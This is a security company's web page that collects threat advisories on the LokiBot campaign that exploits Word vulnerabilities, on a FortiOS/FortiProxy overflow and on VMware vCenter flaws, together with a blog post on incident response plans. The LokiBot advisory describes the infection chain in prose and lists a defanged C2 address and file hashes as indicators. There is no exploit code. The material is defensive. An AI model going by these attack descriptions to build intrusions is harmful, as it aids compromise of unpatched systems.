LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution

LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution

by | Jul 21, 2023 | Threat Advisories

LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution

DOWNLOAD PDF

OVERVIEW
Researchers recently uncovered a LokiBot info-stealer campaign exploiting well-known Microsoft Office related vulnerabilities.

First observed in May 2023, researchers found that threat actors exploited two remote code execution vulnerabilities (CVE-2021-40444 and CVE-2022-30190) embedding malicious macros in Microsoft documents, specifically Word documents.  Infected files were named “document.xml.rels” and had an MHTML link.  Executing this file triggered the deployment of exploits for the second vulnerability.

More recent versions of this attack include an embedded VBA script within the Word document. The VBA script generates an INF file that calls a DLL file, which then downloads a second-stage code injector from a specific URL.  The code injector is capable of evasion techniques and will execute the LokiBot malware in the final stage.

Researcher’s examination of the command-and-control (C2) traffic showed that the LokiBot version (March’23) deployed in these campaigns has an MD5 hash that acts as a mutex to prevent multiple instances of the malware from running concurrently.

INDICATORS OF COMPROMISE

Command and Control:

  • 95[.]164[.]23[.]2

Related Files:

  • 17d95ec93678b0a73e984354f55312dda9e6ae4b57a54e6d57eb59bcbbe3c382
  • 23982d2d2501cfe1eb931aa83a4d8dfe922bce06e9c327a9936a54a2c6d409ae
  • 9eaf7231579ab0cb65794043affb10ae8e4ad8f79ec108b5302da2f363b77c93
  • da18e6dcefe5e3dac076517ac2ba3fd449b6a768d9ce120fe5fc8d6050e09c55
  • 2e3e5642106ffbde1596a2335eda84e1c48de0bf4a5872f94ae5ee4f7bffda39
  • 80f4803c1ae286005a64ad790ae2d9f7e8294c6e436b7c686bd91257efbaa1e5
  • 21675edce1fdabfee96407ac2683bcad0064c3117ef14a4333e564be6adf0539
  • 4a23054c2241e20aec97c9b0937a37f63c30e321be01398977e13228fa980f29

 

RECOMMENDATIONS
• Patch Management – Patch and Update all instances of Microsoft Office.

  • Training and Awareness – Educate users about the risks associated with opening suspicious email attachments or clicking on untrusted links.
  • Cybersecurity Controls (End-Points) – Deploy and effectively manage and monitor advanced endpoint protection solutions that include anti-malware, intrusion detection, and prevention systems.
  • Cybersecurity Controls (Network) – Deploy 24×7 Network Traffic Monitoring capabilities to identify and block suspicious communication with command-and-control (C2) servers.
  • Email Filtering: Enable all available capabilities to scrutinize incoming emails, blocking malicious attachments and links commonly used in malware distribution.
  • Multi-Factor Authentication (MFA): Enforce the use of MFA for all sensitive accounts and systems to provide an additional layer of protection against unauthorized access. This helps mitigate the risk of LokiBot stealing credentials.

REFERENCES

 

What is an Incident Response Plan and Why is it Important?

What is an Incident Response Plan and Why is it Important?

by | Jul 21, 2023 | Blogs

An incident response plan is a document that outlines the needed procedures, steps, and regulations organizations must go through in the case of a virtual threat (data breach) or a physical threat (natural disaster or power shortages). Implementing a cyber breach incident response plan within the organization helps reduce the impact of the damages caused by a threat. The NIST (National Institute of Security and Technology) describes that a breach response plan should have 4 key elements: Preparation (so that an organization can plan accordingly as well as respond to events), Detection and Analysis (analyzing the severity of the incident when it occurs), Containment and Eradication (make sure the damage caused doesn’t worsen), and Post Incident Recovery (all parties concerned in the matter examine the lessons learned, to ensure greater security for the future). The main intentions of the incident response plan is to minimize the damage done, identify stakeholders of the situation, improve recovery time and overall help improve company security. Another benefit of a cyber incident response plan is that it helps identify and protect against potential vulnerabilities.BLOG THUMBNAIL

Team

Apart from the plan itself, the team members that create the incident response plan are also crucial to creating a successful plan, this includes the:

Team Leader/Executive Sponsor– their duties include budgeting the plan and handling communication with the rest of the executives

Incident Manager– Whoever is in charge during the breach

Lead Investigator– The analyst or responder for the incident

Communication/ Public relations – To maintain PR and communications

Legal – A legal representative is needed for the approval of messaging and social laws

Human Resources Representative – To deal with employee-related issues

SOAR

Once the process for the IR is created, the technology necessary for automation of remediation (containment eradication and recovery) needs to be considered. SOAR stands for Security Orchestration Automation and Response. This automation software collects data for all security products owned and threats in order to respond to events with hardly any human assistance. This allows an organization to better focus its security actions in three primary areas: threat/vulnerability management, security operations management, and incident response.

Common Mistakes

It’s important to understand that the method of communication should be specified, in order to ensure that the team can communicate their issues through a primary platform instead of many, which tends to cause confusion. This is also important information in the case of a DDOS attack (Distributed Denial of Service) when a server is flooded with traffic causing a blockage of networks. It’s also important to make surer that communication is prewritten and approved in case of attacks. Finally, it’s important that the team goes through tabletop exercises to make sure everyone is aware of what needs to be done.

Table Top Exercises

Tabletop exercises are activities or simulations with the intent of incorporating proper practice for an organization’s members in order to ensure the best results during the actual threat. There are two main forms of tabletop exercises, which are operational or discussion-based. The main benefit of table exercise is that creates consistency among the team, identifies any faults with the procedure, and helps with recognizing possible resources that could be utilized in the event of a threat or attack. Several common cyber incident response scenarios for tabletop exercises include unauthorized access, device or network compromise, or data breaches.

Tabletop exercises are carried out in order to mimic the real scenario, so when conducting an exercise with the team it’s important to develop the practice scenario thoroughly.  It is also advised to have a timekeeper when doing these exercises. Unpredicted situations that arise are important to keep note of and discuss to figure out the best solutions for these situations. Ideally, these exercises are 1-4 hours and tend to be low cost and low stakes.

How Does an Incident Response Plan Benefit a Company?

One of the biggest benefits of an IR is that it reduces the time of limited production or technical halts (downtime) because it gives detailed information on what a company expects its employees to do in almost any scenario. Another key benefit is more so on the PR side, but an IR is crucial in maintaining public trust. When a company has the capacity to recover from an attack, it demonstrates that they are keen on protecting data. The third benefit is that an IR makes sure a company stays compliant. By doing so, it ensures that the company doesn’t encounter an unforeseen lawsuit filed by unhappy clients. This also allows for a company to be as prepared as possible when threats do strike, as the best course of action is already premeditated and the employees would have already been trained through their tabletop exercises. Another key benefit of an incident response plan is that it helps minimize the damage done by an attack. Without a proper cyber breach incident response in place, financial, legal, and operational damages can worsen over time.

 

 

LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution

A Vulnerability in FortiOS and FortiProxy Could Allow for Remote Code Execution

by | Jul 18, 2023 | Threat Advisories

A Vulnerability in FortiOS and FortiProxy Could Allow for Remote Code Execution

DOWNLOAD PDF

OVERVIEW
A vulnerability has been discovered in Fortinet FortiOS and FortiProxy, which could allow for remote code execution. FortiOS is the Fortinet’s proprietary Operation System which is utilized across multiple product lines. FortiProxy is a secure web gateway that attempts to protects users against internet-borne attacks, and provides protection and visibility to the network against unauthorized access and threats. Successful exploitation of this vulnerability could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

THREAT INTELLIGENCE
There are currently no reports of these vulnerabilities being exploited in the wild.

SYSTEMS AFFECTED

  • FortiOS version 7.2.0 through 7.2.3
  • FortiOS version 7.0.0 through 7.0.10
  • FortiProxy version 7.2.0 through 7.2.2
  • FortiProxy version 7.0.0 through 7.0.9

RISK

Government:

  • Large and medium government entities: High
  • Small government entities: Medium

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium


Homes: Low

TECHNICAL SUMMARY
A vulnerability has been discovered in Fortinet FortiOS and FortiProxy, which could allow for remote code execution. Details of the vulnerability are as follows:

TacticInitial Access (TA0001):

Technique: Exploit Public-Facing Application (T1190):

  • CVE-2023-33308 – A stack-based overflow vulnerability in FortiOS & FortiProxy may allow a remote attacker to execute arbitrary code or command via crafted packets reaching proxy policies or firewall policies with proxy mode alongside SSL deep packet inspection.

Successful exploitation of this vulnerability could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

RECOMMENDATIONS
We recommend the following actions be taken:

Apply appropriate updates provided by FortiNet to vulnerable systems immediately after appropriate testing. (M1051: Update Software)

    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
    • Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
    • Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
    • Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
    • Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.

      Utilize vulnerability scanning to find potentially exploitable software vulnerabilities to remediate them. (M1016: Vulnerability Scanning)

      • Safeguard 16.13: Conduct Application Penetration Testing: Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing.Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.

        Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)

        • Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
        • Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
        • Safeguard 5.5: Establish and Maintain an Inventory of Service Accounts: Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.
        • Safeguard 6.8: Define and Maintain Role-Based Access Control: Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.

REFERENCES

LokiBot Malware Exploits Microsoft Word Vulnerabilities for Widespread Distribution

Multiple Vulnerabilities in VMware Products Could Allow for Arbitrary Code Execution

by | Jun 26, 2023 | Threat Advisories

Multiple Vulnerabilities in VMware Products Could Allow for Arbitrary Code Execution

DOWNLOAD PDF 

OVERVIEW
Multiple vulnerabilities have been discovered in VMware vCenter Server and Cloud Foundation, the most severe of which could allow for arbitrary code execution. VMware vCenter Server is the centralized management utility for VMware. VMware Cloud Foundation is a multi-cloud platform that provides a full-stack hyperconverged infrastructure (HCI) that is made for modernizing data centers and deploying modern container-based applications. Successful exploitation of these vulnerabilities could allow for arbitrary code execution in the context of the administrator account. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

THREAT INTELLIGENCE
There are no reports of these vulnerabilities being exploited in the wild.

SYSTEMS AFFECTED

  • VMware – VMware vCenter Server (vCenter Server) versions prior to 8.0 U1b
  • VMware – VMware vCenter Server (vCenter Server) versions prior to 7.0 u3m
  • VMware – VMware Cloud Foundation (vCenter Server) versions prior to 7.0 U3m, 8.0 U1b

RISK

Government:

  • Large and medium government entities: High
  • Small government entities: Medium

Businesses:

  • Large and medium business entities: High
  • Small business entities: Medium

Homes: Low

TECHNICAL SUMMARY
Multiple vulnerabilities have been discovered in VMware vCenter Server and Cloud Foundation, most severe of which could allow for arbitrary code execution. Details of these vulnerabilities are as follows:

TacticInitial Access (TA0001):

Technique: Exploit Public-Facing Application (T1190):

  • CVE-2023-20892 – VMware vCenter Server heap-overflow vulnerability – The vCenter Server contains a heap overflow vulnerability due to the usage of uninitialized memory in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit heap-overflow vulnerability to execute arbitrary code on the underlying operating system that hosts vCenter Server.
  • CVE-2023-20893 – VMware vCenter Server use-after-free vulnerability – The VMware vCenter Server contains a use-after-free vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may exploit this issue to execute arbitrary code on the underlying operating system that hosts vCenter Server.

Details of lower-severity vulnerability are as follows:

  • CVE-2023-20894 – The VMware vCenter Server contains an out-of-bounds write vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bound write by sending a specially crafted packet leading to memory corruption.
  • CVE-2023-20895 – The VMware vCenter Server contains a memory corruption vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger a memory corruption vulnerability which may bypass authentication.
  • CVE-2023-20896 – The VMware vCenter Server contains an out-of-bounds read vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger an out-of-bounds read by sending a specially crafted packet leading to denial-of-service of certain services (vmcad, vmdird, and vmaf

Successful exploitation of these vulnerabilities could allow for arbitrary code execution in the context of the administrator account. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
|

RECOMMENDATIONS
We recommend the following actions be taken:

  • Apply appropriate updates provided by VMware to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
    • Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
    • Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
    • Safeguard 7.6: Perform Automated Vulnerability Scans of Externally-Exposed Enterprise Assets: Perform automated vulnerability scans of externally-exposed enterprise assets using a SCAP-compliant vulnerability scanning tool. Perform scans on a monthly, or more frequent, basis.
    • Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
  • Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
    • Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
    • Safeguard 5.4: Restrict Administrator Privileges to Dedicated Administrator Accounts: Restrict administrator privileges to dedicated administrator accounts on enterprise assets. Conduct general computing activities, such as internet browsing, email, and productivity suite use, from the user’s primary, non-privileged account.
  • Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc. (M1035: Limit Access to Resource Over Network)
  • Use intrusion detection signatures to block traffic at network boundaries. (M1031: Network Intrusion Prevention)
    • Safeguard 13.3: Deploy a Network Intrusion Detection Solution: Deploy a network intrusion detection solution on enterprise assets, where appropriate. Example implementations include the use of a Network Intrusion Detection System (NIDS) or equivalent cloud service provider (CSP) service.
    • Safeguard 13.8: Deploy a Network Intrusion Prevention Solution: Deploy a network intrusion prevention solution, where appropriate. Example implementations include the use of a Network Intrusion Prevention System (NIPS) or equivalent CSP service.
  • Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)

Safeguard 13.10:  Performing Application Layer Filtering:  Perform application layer filtering. Example implementations include a filtering proxy, application layer firewall, or gateway.

REFERENCES